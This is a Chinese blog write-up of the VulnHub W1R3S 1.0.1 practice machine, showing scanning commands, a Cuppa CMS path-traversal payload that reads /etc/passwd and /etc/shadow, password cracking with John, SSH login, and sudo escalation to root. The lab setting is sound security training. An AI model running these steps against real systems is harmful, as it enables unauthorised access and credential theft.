W1R3S: 1.0.1靶机

于 2024-08-08 19:34:49 发布
阅读量227 收藏 3
点赞数 4
文章标签: 网络安全 开源 github 学习方法 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61995767/article/details/141034743
版权

靶机地址:W1R3S: 1.0.1 ~ VulnHub

打开靶机,将靶机与攻击机kali设为桥接模式,并查看靶机MAC地址:

一、信息收集

确定目标主机:

arp-scan -l

使用nmap扫描开放的端口

nmap -A -sS -sV -v -p- 192.168.7.117

发现ftp服务可以使用Anonymous用户进行匿名登录

查看当前目录,依次查看发现的三个文件,并将其下载下来

将上方下载好的txt文件依次查看:

content文件夹中:

发现02.txt存在如图两个加密字符串,在解密之前要判断加密方式,可以使用kali自带的hash-identifier来判断

hash-identifier 01ec2d8fc11c493b25029fb1f47f39ce     #发现是md5加密

利用MD5在线解密(工具:MD5免费在线解密破解_MD5在线加密-SOMD5),解密为

对SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==进行base64解密(工具:锤子在线工具网 - 首页),无有用信息

docs文件夹中:无有用信息利用

new-employees文件夹中:发现是员工名单和职位的表

浏览器访问80端口:

使用dirb进行目录扫描:

dirb http://192.168.7.117/

拼接/administrator/installation/index.php

发现是Cuppa CMS

二、漏洞检测

在kali上使用searchsploit搜索相关漏洞

cp /usr/share/exploitdb/exploits/php/webapps/25971.txt .   #将可利用的25971.txt文件复制到当前目录下
cat 25971.txt

利用其exp进行尝试,拼接/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd,发现w1r3s用户是/bin/bash拥有可执行权限

(这里有几个地方需要特别注意的:

1.url的拼接问题,可以看到这个靶机是拼接在http://192.168.0.159/administrator的后面的,这是通过不断尝试测出来的

2.提供的exp里面路径还有一节/cuppa/,但是在实际或者大多数情况下这个CMS的主目录都是会被删除的,这点要注意

3.如果你的参数get发出去没有成功,试试post方法;通过hackbar或者curl命令都可以)

查看/etc/shadow密码文件,发现了三个用户(root、www-data、w1r3s)加密的密码

对w1r3s用户使用John进行解密,将其密码放到hash.txt中

touch hash.txt
vim hash.txt    #将w1r3s用户的密码添加到hash.txt文件中

john hash.txt --wordlist=rockyou.txt

尝试w1r3s computer进行ssh连接

ssh w1r3s@192.168.7.117

三、权限提升

sudo -l    #查看可提权的命令

sudo su

提权成功!

查看flag:

嗷嗷~嗷嗷~
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队打靶:W1R3S: 1.0.1详细打靶思路(vulnhub)
Bossfrank的博客
05-30 3548
本文是vulnhub靶机W1R3S: 1.0.1详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
vulnhub靶场——W1R3S: 1.0.1
Czheisenberg的博客
12-16 650
ftp匿名登录。Cuppa CMS 存在文件包含漏洞。/etc/passwd 和 /etc/shadow 的利用/etc/shadow 可破解。
VulnHub-W1R3S: 1.0.1渗透学习
我是小小白的博客
07-09 478
VulnHub-W1R3S: 1.0.1渗透学习 前言 靶机地址:https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip 靶机难度:初级(CTF) 靶机发布日期:2018 年 2 月 5 日 靶机描述:您受雇在 W1R3S.inc 个人服务器上进行渗透测试并报告所有结果。他们要求您获得 root 访问权限并找到标志(位于 /root 目录中); 目标:得到root权限&找到flag.txt 作者:我是小小白 时间:2021-07-09 请注意: 本博客
vulnhub——W1R3S: 1.0.1
m0_61619198的博客
07-07 238
vulnhub——W1R3S: 1.0.1
红队笔记-1:W1R3S: 1.0.1打靶流程(vulnhub)
qq_63442530的博客
03-13 1000
1.主机发现&端口扫描:主机发现目标主机ip:192.168.254.141,发现存活端口:21(tcp)22(ssh) ,80(http),3306(mysql)
靶机渗透】w1r3s.v1.0.1靶机渗透练习
serendipity1130的博客
08-30 575
靶机描述:您受雇在W1R3S.inc个人服务器上进行渗透测试并报告所有结果。他们要求您获得root访问权限并找到标志(位于/root目录中) 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.142 2.扫描端口 nmap 192.168.225.142 -sV -sC -Pn -n -v -T5 -p- 3.使用gobuster扫到后台路径: gobuster dir -u http://192.168.225.154/ -w /usr/share/wordl.
红队靶机渗透-W1R3S 1.0.1
m0_57967573的博客
04-29 1767
nmap扫描获得了系统的4个端口,21,22,80,3306,都是标准的服务端口;对4个端口排布之后,先看了匿名的FTP,获得了若干文件文件,逐一查看,该破解的破解,该做字符处理的字符处理;然后看了3306是禁止连接的;80端口先是目录爆破,得到3个目录wordpress、javascript、administrator,javascript是无法访问的,因为wordpress的路径问题当时没有配置成功,需要做大的调整,所以暂时放弃了这条路······
VulnHub-W1R3S: 1.0.1-靶机渗透学习
嗯嗯呐的博客
11-21 1638
**靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 靶机难度:中等(CTF) 靶机描述:你被雇来对W1R3S做渗透测试。公司个人服务器并报告所有发现。他们要求您获得root权限并找到标志(位于/root目录中)。 目标:得到root权限目录信息收集LFI漏洞利用john密码破解提权总结 信息收集 Nmap ip扫描,确认靶机IP地址 Namp 端口扫描 21 FTP协议(可以匿名访问) 22 SSH 80 http 3306 mysql 先
w1r3s.v1.0.1靶机
weixin_71232352的博客
08-06 271
w1r3s.v1.0.1靶机
解决Missing artifact javax.transaction:jta:jar:1.0.1B
12-12
1. 解压文件得到:jta-1_0_1B-classes.zip 2. cmd进入zip文件所在目录 ...mvn install:install-file -Dfile=./jta-1_0_1B-classes.zip -DgroupId=javax.transaction -DartifactId=jta -Dversion=1.0.1B -Dpackaging=jar
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
emas-services-1.0.1.jar
09-17
<!... ... <artifactId>emas-services <version>1.0.1 mvn install:install-file -DgroupId=com.aliyun.ams -DartifactId=emas-services -Dversion=1.0.1 -Dpackaging=jar -Dfile=F:\jars\emas-services-1.0.1.jar
mq-msgpush-sdk-1.0.1.jar
05-24
《mq-msgpush-sdk-1.0.1.jar:消息推送SDK详解及应用实践》 在IT行业中,消息推送服务已经成为应用程序与用户互动的关键组件。mq-msgpush-sdk-1.0.1.jar是一个专用于消息推送的Java软件开发工具包(SDK),它允许...
geronimo-j2ee-management_1.1_spec-1.0.1-API文档-中文版.zip
04-08
赠送jar包:geronimo-j2ee-management_1.1_spec-1.0.1.jar; 赠送原API文档:geronimo-j2ee-management_1.1_spec-1.0.1-javadoc.jar; 赠送源代码:geronimo-j2ee-management_1.1_spec-1.0.1-sources.jar; 包含...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8371
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
开源威胁情报查询
最新发布
学-> 思->用
08-07 147
【代码】开源威胁情报查询。
FLUX.1 实测,堪比 Midjourney 的开源 AI 绘画模型,无需本地显卡,带你免费实战
u010522887的专栏
08-07 619
玩转地表最强开源 AI 绘画模型
开源SFTP服务器软件SFTPGo
wbsu2004的博客
08-05 1636
SFTPGo 是一款基于 Go 语言开发的开源 SFTP 服务器软件,能够为用户提供安全、可靠和高效的文件传输服务。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值